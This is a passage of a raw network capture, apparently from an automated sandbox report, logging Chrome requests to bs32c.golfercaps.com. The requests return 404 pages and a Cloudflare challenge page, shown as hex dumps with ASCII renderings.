                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC844INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjhReT7ejfZs24gnomwVNDIeeo%2B4VpuO%2FbjtXoEEIXUcZzCLzXOs5guOODF1relggcr5E3ApLTotfp2FudZjYZaXkpHXDSDZzU%2BU7N3eXP3FjV1OhJMG5sxNbfC531yVf7ECt%2BWZ%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533744e394316-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1733&rtt_var=660&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2047&delivery_rate=1645070&cwnd=177&unsent_bytes=0&cid=3c0454632158cfff&ts=269&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  52192.168.2.458514188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:39 UTC1444OUTGET /vfd23ced/assets/icon_check_sthischecked.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC842INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TBW6q%2FO2fnTq5TtFKizhNozWyKrUEfMJjrvfiUDW7TkiE31zlSN53OaUAMo%2Bu%2BPkhTwKW8uBKPAcqdy6nrqvBY3Y0kq1WIWO61YVLzOSqWDHS95mxCeUygl0H1JwTaN9sZt5huC%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533744eba4237-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1684&rtt_var=648&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2044&delivery_rate=1667618&cwnd=194&unsent_bytes=0&cid=959c4ecbf198d8d0&ts=193&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  53192.168.2.458513188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1452OUTGET /vfd23ced/assets/icon_check_sthischecked_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC846INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUSsHL2kkkEvw4nHPapYNdR%2B4Xw0c3tIU51L%2BpxIlwWzvnZrZ7%2BZ26IDlr7Zw%2FvzomGxKcnO%2BJXorK0BzO8kCUwgbYJjf3IYaz%2BqPEAOaiaZn8c5o3ynZ2A235JpTOfvaW9dvnVwlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533746aa8c47c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1676&rtt_var=631&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2052&delivery_rate=1730883&cwnd=210&unsent_bytes=0&cid=3c116a15858880ca&ts=278&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  54192.168.2.458511188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC1443OUTGET /vfd23ced/assets/icon_check_not_checked.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC844INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EylvB9lGo%2FcxxVQnYrQbERlYAfUk%2Bm5g%2BrsEEwEe8jDMn3y1jjpI5RXiYU8NYyYfCc%2BaUN5soHz%2FYyVsy9JPw1OxHkBh0mHstApV5HK4b7wepDEXmAucPlh5nfBviWUI6vaaLi99Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533747c6f437f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2816&min_rtt=1642&rtt_var=1454&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2043&delivery_rate=1778319&cwnd=79&unsent_bytes=0&cid=ef5db0c68591ce90&ts=310&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  55192.168.2.458516188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:40 UTC369OUTGET /vfd23ced/assets/image.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:40 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:42:40 UTC914INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 43 69 4a 6a 68 67 42 50 48 6f 78 55 58 67 63 34 4f 5a 65 6a 58 47 37 48 66 43 79 52 42 53 7a 63 6f 59 56 6d 79 51 2f 56 4b 75 30 67 42 68 39 5a 36 72 30 48 4b 4e 6e 47 69 6d 4e 44 6e 6b 6d 69 38 30 4c 5a 52 6b 44 63 5a 59 79 2f 2b 35 74 6a 56 59 63 4f 74 45 6c 4f 34 72 50 42 66 75 2b 48 48 57 47 58 63 32 6d 4e 52 30 34 3d 24 75 73 36 67 74 65 74 44 6b 2f 66 6f 4c 50 69 68 41 71 36 6c 69 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: CiJjhgBPHoxUXgc4OZejXG7HfCyRBSzcoYVmyQ/VKu0gBh9Z6r0HKNnGimNDnkmi80LZRkDcZYy/+5tjVYcOtElO4rPBfu+HHWGXc2mNR04=$us6gtetDk/foLPihAq6liw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 32 32 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 228e<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 71 36 59 74 48 41 55 46 37 70 37 36 44 52 68 50 47 5a 41 5a 53 77 6f 44 79 62 44 48 77 44 34 42 47 59 4c 4a 6d 42 54 50 49 44 77 45 56 62 6a 74 33 78 6f 55 2e 4a 4e 6c 66 62 4f 6e 57 7a 6a 2e 4c 72 75 6b 30 41 52 6a 54 49 63 69 70 71 6f 44 72 66 78 42 71 4c 48 69 6e 44 37 38 70 37 35 50 47 45 58 65 71 47 6d 42 44 33 77 39 55 76 37 70 53 2e 4c 59 78 33 4f 72 49 6e 51 4e 52 64 50 49 70 55 59 6c 4d 51 43 51 61 61 45 64 6a 4a 47 6a 54 66 48 49 71 34 4d 6c 5f 49 47 73 58 57 52 50 32 77 68 63 55 4d 65 79 6d 72 55 78 54 5f 78 75 64 32 76 41 77 57 31 64 54 4c 63 59 53 38 6b 5a 58 71 66 4a 52 37 35 66 72 61 61 4c 72 69 53 75 4b 59 38 64 32 54 49 4c 4b 76 6d 67 55 2e 5f 58 64 52 44 48 33 4e 58 6e 49 5f 41 58 75 70 43 37 75 30 64 47 66 68 77 31 49 36 69 34 7a 71 62
                                                                  Data Ascii: q6YtHAUF7p76DRhPGZAZSwoDybDHwD4BGYLJmBTPIDwEVbjt3xoU.JNlfbOnWzj.Lruk0ARjTIcipqoDrfxBqLHinD78p75PGEXeqGmBD3w9Uv7pS.LYx3OrInQNRdPIpUYlMQCQaaEdjJGjTfHIq4Ml_IGsXWRP2whcUMeymrUxT_xud2vAwW1dTLcYS8kZXqfJR75fraaLriSuKY8d2TILKvmgU._XdRDH3NXnI_AXupC7u0dGfhw1I6i4zqb
